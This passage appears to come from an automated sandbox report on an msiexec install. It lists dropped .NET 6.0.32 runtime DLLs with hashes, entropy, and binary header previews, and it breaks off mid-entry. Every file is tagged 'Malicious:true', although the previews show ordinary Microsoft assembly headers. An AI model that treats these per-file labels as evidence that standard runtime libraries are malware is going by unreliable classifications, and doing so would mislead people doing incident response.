                                                                                                                                                                                                                                        SHA-512:71D87E0774C058CBEA08AB309288B596BD4597F68E9B521A0556E8EB8236BF02B2D17CD31E09033744653AE0D38F9F5A2805D0855528C2A51590BE91143DF1A0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ...................................`.................................`)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P .......................................V(.$.G.r..!}E2Us.x..o....F....I...J.yU..2..........2.S.d.|..+Vp&..\..y_.n.KQh.a.E..`.....ep..G.2Z.4.s3.._.z...j.vC#...BSJB............v4.0.30319......`.......#~..L.......#Strings............#GUID...,.......#Blob......................3................................................!.J.....J..._.7...j.......................E...........Z.......................A.....s.....u.J.................1.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72368
                                                                                                                                                                                                                                        Entropy (8bit):6.5347936763696195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:fHuxn2SjgTCcxduILBZIds7lgndSI0bWBYWMzlm5:fOx2Rld9lZz7lukI0baYvZ6
                                                                                                                                                                                                                                        MD5:160C8055B1230CECDB195BD6057BF3D6
                                                                                                                                                                                                                                        SHA1:1BE7BB10FD675CE1D979CC43386EB478BC677E5C
                                                                                                                                                                                                                                        SHA-256:B2D5F23950B2CFE9056624E6A1E6CB78FEDD1775F8E490B6F6D597FE6B9453BE
                                                                                                                                                                                                                                        SHA-512:9E606F7EB6B4A4AF5194ACD3443B23E2A178383826B49F16D544DDDD2E1BA5C3374DD0E6E6B765EBDC8EBFF47B2BB5580968532C4F29F2F4A4F0CBB6CA67D3F1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...K............." ......................................................... ............`...@......@............... ..................................P...d(...........(......p.......T...........................................................P...H............text............................... ..`.data...............................@....reloc..p...........................@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24344
                                                                                                                                                                                                                                        Entropy (8bit):6.355803501821008
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:D5aPWc+mFnJ85Zu+m2sqjd5z5nNkcf2LthQWy72WQX6HRN7D02R9zEeMG:4P7Fn8dPfVqAY6IWwK9zXt
                                                                                                                                                                                                                                        MD5:1E9BC95C5CE564B1FFA33FB4BAA3C82B
                                                                                                                                                                                                                                        SHA1:CF9F928BEF3268F27E88A50BDF468D6488C6A936
                                                                                                                                                                                                                                        SHA-256:008BF6401C475B5E85C15D0756F6E377EE2BCD742DB2667D7A502C9EEFFDD721
                                                                                                                                                                                                                                        SHA-512:4DE834DD2107D4A1411596056C71FD4E2022FE26FA379E70A0F78374D0C7DBAEF34F292493716029755126B567CCED04539277E71C17A29E92D0EC5ADB8630E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."!..0..,..........NJ... ........@.. ....................................`..................................I..S....`...............6...)..........LI..8............................................ ............... ..H............text...T*... ...,.................. ..`.rsrc........`......................@..@.reloc...............4..............@..B................0J......H.......h?..............P .......>.....................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....9.......PADPADP..7../...........S.t...p..T...3.2...0.J.M.*.=.0....bAA. .e......"....N..~..s...@].Sew.s.t.7.4...5.......x..........]..Q~........#n..'.<.+2]./...0...2.W.4...4>..5q..:...>(.3OL"PP^..V~..VV..eRaDf.3.f7..f..fj.Hpj.1.j..&u

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):83616
                                                                                                                                                                                                                                        Entropy (8bit):6.495444697679031
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:BzPryEnJOCVHF9BR5sWApdNeK+M33e6Z3IVi+i8zQ+:BDnJOCVBR5sWApdNe433e6u4+zk+
                                                                                                                                                                                                                                        MD5:D7676E8A49066209E0FA8CA44E8B9407
                                                                                                                                                                                                                                        SHA1:D8595DB79E999D334216A785E07FB33940CEEE79
                                                                                                                                                                                                                                        SHA-256:A8E4E2CDFC6FAA5BA11945BD6212B81C9603D8EAE8C7BFC7C2722EFA2B58513F
                                                                                                                                                                                                                                        SHA-512:28549BC603E12A4F05A59B873A7E319E3A36E4E55436EDB6C117E21CAD0FC11F772B22BF399463BB8CABB9FC9A085FC924548455BBFDECC89EF034F07E70147A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....MX..........." .........................................................P............`...@......@............... ..................................8....,...........(...@..........T...........................................................8...H............text............................... ..`.data...}.... ......................@....reloc.......@......................@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69408
                                                                                                                                                                                                                                        Entropy (8bit):6.415564775018847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Oel44fb3OrgQqy2gYSxycVFidrg0TwK9WWzjn:Oel13O2y2gYMXVAdrg0TwK9tHn
                                                                                                                                                                                                                                        MD5:B9F00468A42AEF4650D7DDDDA2B48A49
                                                                                                                                                                                                                                        SHA1:1B75047EE318C2C2596C74AAD1977CF1F17BF01F
                                                                                                                                                                                                                                        SHA-256:E9668809465731AEBE17CDAC847B1650896C65FB7934313ED075F9C331631E98
                                                                                                                                                                                                                                        SHA-512:C8F4CC2E4182EFE98B3AA25D6BBF0EA6BD9530EDE2D3F3BFC48387FF7A041A22B0C8969860B7161C92B88EBCE30BDF3B6F47EB5B675464E0C9C08847ED10D980
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....NP..........." ................................................................$.....`...@......@............... ..................................D...@%.......... )..............T...........................................................H...H............text............................... ..`.data...h...........................@....reloc..............................@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                                        Entropy (8bit):6.8039485559108055
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:sQ3WehWqW+oPWgYA6VFHRN7PVXC4deR9zVjoxpK:93WSgfFClPVXC4dC9zVjGY
                                                                                                                                                                                                                                        MD5:7C4C0AB06F827D12B5BB0609E34B881D
                                                                                                                                                                                                                                        SHA1:EDB76E9DF5E177D260AD8E5739375E00CD16C412
                                                                                                                                                                                                                                        SHA-256:058C76CDC0BE8AB0F583ACE5651F1CE1EE7D3D1178DBE2D03829A7D52723A2FF
                                                                                                                                                                                                                                        SHA-512:05AF881F2603C59539802A2CE86D6204BDE877860F3FADF302FCD60B96EC87026FE8379830BBBED7A7E7B8226BB8427B7101A6F49E509A1FB383FD8B54DC3168
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............."!..0..............-... ........@.. ....................................`.................................4-..W....@..T................)...`......p,..8............................................ ............... ..H............text........ ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B................p-......H........"..............P ......h"...........................................<linker>.. <assembly fullname="System.IO.Pipes.AccessControl" feature="System.Resources.UseSystemResourceKeys" featurevalue="true">.. System.Resources.UseSystemResourceKeys removes resource strings and instead uses the resource key as the exception message -->.. <resource name="FxResources.System.IO.Pipes.AccessControl.SR.resources" action="remove" />.. <type fullname="System.SR">..

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):136352
                                                                                                                                                                                                                                        Entropy (8bit):6.501718336587814
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:igZr1fdLwfRDI76D+/PeCMk0eZeBClJk87+xL8a:fKM++/2U0EaxLx
                                                                                                                                                                                                                                        MD5:8C160837F5ABB45FC6D74EB314DC4E33
                                                                                                                                                                                                                                        SHA1:CEF2A93F9E2C12F6AAEE0E43923C9B3D9D701D23
                                                                                                                                                                                                                                        SHA-256:5C402A50C62ADF3BB0538F520CA2E8D56788B877020EA11A22B5A48072DF95A5
                                                                                                                                                                                                                                        SHA-512:CCB662F219CA181FE2C78286BF9F41121B8D89CBA4E632787C1E9F302D961D044127007DE0C503896C8EC9DCA7B9E4B85A8A56CF81D44CFCDAD122391200BDAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...~.1..........." .........(............................................... ............`...@......@............... ......................................H;...........(..............T...............................................................H............text............................... ..`.data....".......$..................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                                        Entropy (8bit):6.845221810436923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cZdi0aXwMxx03Wjz+WCWxNzx95jmHnhWgN7agWWOx6RMySX01k9z3AHVKJ8RS5un:gitwa+3Wjz+WRX6HRN7nVMR9zGVK4bT
                                                                                                                                                                                                                                        MD5:755EF43FE4AAB7CAE2C2DA7CE10A750A
                                                                                                                                                                                                                                        SHA1:423B058EFFF8908589BFF756320120AED1454B3C
                                                                                                                                                                                                                                        SHA-256:4170A7DB857A937751EA07AF981B7F31A43FCAA58240456F1789B5F812AD2E58
                                                                                                                                                                                                                                        SHA-512:468124870FF78D353D174E454C0221408B882F97A9D9C2DA5C14DAB36A6E48BC8F73C229F20E7250278B6B0B3CF628EF631EF220F7498C4694C4D0BA85CC8A63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.D..........."!..0..............)... ........@.. ...............................G....`..................................)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................X}...zO........A9.>.i.(d.?U..)...$....+tw|....\....hX...r.....g.Ve.bO/....Y).p.....v)....h./...HABMc....gbb.k..g.h....+...y#BSJB............v4.0.30319......`.......#~..<.......#Strings....,.......#GUID...<.......#Blob......................3................................................,...........E...........p.......W.................^...+.^.....^...e.^.....^.....^.....^...L.^...Y.^.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.6752554941051985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ldbn83FYyW20bWMYA6VFHRN7m2HR9z7YbG:/n4srFClx9zMG
                                                                                                                                                                                                                                        MD5:410EE7A35F9C5BB29AA397824BCE39D1
                                                                                                                                                                                                                                        SHA1:75792618F9940C7BF5DC052231945FC742D9A81A
                                                                                                                                                                                                                                        SHA-256:29BDE1A93C26C8EEB0EE4972F63D1D562541CD918F1868E691587C0B362ED1DB
                                                                                                                                                                                                                                        SHA-512:6A19E98CF43AEB70A4E1A2885875203F23A9C2B797A43748B840C2B43BB1C638EEF623C054C22D292B68683C44C2AD922B1700A0C642B0DD20E5FC91D4ADEFEC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?~5..........."!..0.............~*... ........@.. ...............................#....`.................................0*..K....@..(................(...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................`*......H........ ......................P ..........................................q.=.h...G.].l.V,8...Y.E(..C....~..G..T....rKMO.4.....^0..QFA.>..N....F..xe../^.M.......).1....P...h..)....k....BSJB............v4.0.30319......`.......#~......8...#Strings....,.......#GUID...<.......#Blob......................3............................................................=.....).....h.....k...........#...........8.............................Q.....S.........................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3857072
                                                                                                                                                                                                                                        Entropy (8bit):6.688440344738366
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:35JRCk40qWhSxCKB+GuuYKfM21hDPX7dRVLTeeYjGt553P77zbr7jrgrr+c9NHXd:JJRCUhSzBpzfl1mja52rr+uNHXU6
                                                                                                                                                                                                                                        MD5:03817413A12530268745BDCC91AAC707
                                                                                                                                                                                                                                        SHA1:351EA9C2B95D678A4CA38A650AB3D1315D4E1561
                                                                                                                                                                                                                                        SHA-256:96E479247C696952FDBCBBADE7F4883F4CC464499A403E0A5FF738D297829261
                                                                                                                                                                                                                                        SHA-512:333C29DB2E0E691531AD01BCB871B12D43FB2EE5AF78151ADE980A1D1211BE85FAB6F570BD93FD8A2146F62E5C3C46288DB13DF3D96B40193E469B9308C24BEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...m.@..........." .....F4..j................................................:.....O);...`...@......@............... .......................................(........:..(...p:..b...w..T...............................................................H............text...(E4......F4................. ..`.data........`4......H4.............@....reloc...b...p:..d...N:.............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...E.x.p.r.e.s.s.i.o.n.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):849056
                                                                                                                                                                                                                                        Entropy (8bit):6.794704230215764
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+FeeO6ALy/iA4mQ72yamRPFs7AGiFpIO+tFKQRYSHqsXeUcWDaqTM9tFe9Qvg:ZmiAlQ72yhFwAZF+tkiVcWoHFemg
                                                                                                                                                                                                                                        MD5:5ADDED89B8001FFA882A96EA03EBEC21
                                                                                                                                                                                                                                        SHA1:E5BFCAB29D9E5485DF9DC1BA057505936A33815E
                                                                                                                                                                                                                                        SHA-256:A2664E1104C16FB6DBC0603242E0AF6F0D38AC24A0EF01ECAAAF7DE65C56FCF6
                                                                                                                                                                                                                                        SHA-512:8786241DE8DB8CD0720AD5DB2AF16DC8C45A45F7C1BACE8E0617D237F1B4965AC52E5B6ED2838DD1C7A9AB98B80F5F5EEBD8DAEE3D15F549036923D383CB34AB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...G ............" .....X...r......................................................7.....`...@......@............... ..........................................8p.......(......P...H...T...............................................................H............text....V.......X.................. ..`.data....X...p...Z...Z..............@....reloc..P...........................@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...B.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...P.a.r.a.l.l.e.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...R.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):228512
                                                                                                                                                                                                                                        Entropy (8bit):6.511612190549698
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:o60e3dNNnG64C2fNxE3SkRn5Hg49GqP2Y9d1:50eNjG6p4BKSiGqP2Y9r
                                                                                                                                                                                                                                        MD5:73C18427DA955DEAD09F5A4E6FAD1DA6
                                                                                                                                                                                                                                        SHA1:30B3F49B9945E775EA643B960B744CE418D9B282
                                                                                                                                                                                                                                        SHA-256:8700D3569EEF72DA62E12691FF0315C68EE52A1338E2DA0CF0B4DABE4DAEDF25
                                                                                                                                                                                                                                        SHA-512:5962B867BED237C785F15FE6344076E3FD5D87E5378DCF0EE26CD0B705819BF949089C5BEB0F3F158D6C5125B2B9073DE2B9F6B9738102A6EA4C53024F55490B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........z...............................................p......G.....`...@......@............... .......................................4.......T...(...`......h...T...............................................................H............text............................... ..`.data....n.......p..................@....reloc.......`.......J..............@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...D.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...Q.u.e.r.y.a.b.l.e...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...T.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):537760
                                                                                                                                                                                                                                        Entropy (8bit):6.825314740819405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:mLv9rD97INzrSLW5iIEobS5lEPsypTcenKskBvYvvyejaQO02KuXlz8J1J4+PDx3:SFrZ7IA65iIET5mYIKsk8HQVUASxWzw
                                                                                                                                                                                                                                        MD5:C17BF3E01C0C6CDD92FA8F7A9C443A48
                                                                                                                                                                                                                                        SHA1:1C2C87C078F55FA89AEC4577D1E8767EFF4633EF
                                                                                                                                                                                                                                        SHA-256:393C29BB232D566B91AFE4C7D6294D54997A48D43901043A9B499D62EC3F014B
                                                                                                                                                                                                                                        SHA-512:9509A361B4FA345ECAC9CE0EF69026EDDF2054CEDCCC5C7D7100C4BE31DD02697521E665E91E05E6CCFB9D9A46BC521DCFA77F01220234B473DF5E6D133AB39E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E............." .....`................................................... ......s.....`...@......@............... ..................................4...$...8F.......(..............T...........................................................8...H............text...._.......`.................. ..`.data.......p.......b..............@....reloc..............................@..B............................................0.......................$.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........<.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...0.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...L.i.n.q...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...@.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...L.i.n.q...>.....F.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):173728
                                                                                                                                                                                                                                        Entropy (8bit):6.792861918315237
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sKRVN4ab6HEuCKvSwOy6fM/vfovpPh/h/tmlIYrAoS1bUgM1ud:NP+GKjtGPh/hwlUoF1I
                                                                                                                                                                                                                                        MD5:B1B563F093EE1F4C05B3D0D9DF59BC05
                                                                                                                                                                                                                                        SHA1:AF1B3BC9BEE01FBF75759F17D57AF109F7FCABDA
                                                                                                                                                                                                                                        SHA-256:25F850EBE1D79A8DE785C29DAB88CC21417501186832D70FE68293993E2F6889
                                                                                                                                                                                                                                        SHA-512:25151F701606379FCD726C3B310EB52388E82943D1418467D9B23AEC48F00B43021E0BFEEC305F88778B0DDD9BB3C00FBF9CEB6F400317EE39072001925D6BFA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....P...,.......................................................H....`...@......@............... ..................................D...d<.......~...(..............T...........................................................H...H............text....N.......P.................. ..`.data....'...`...(...R..............@....reloc...............z..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0...4.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...M.e.m.o.r.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...D.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...M.e.m.o.r.y...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
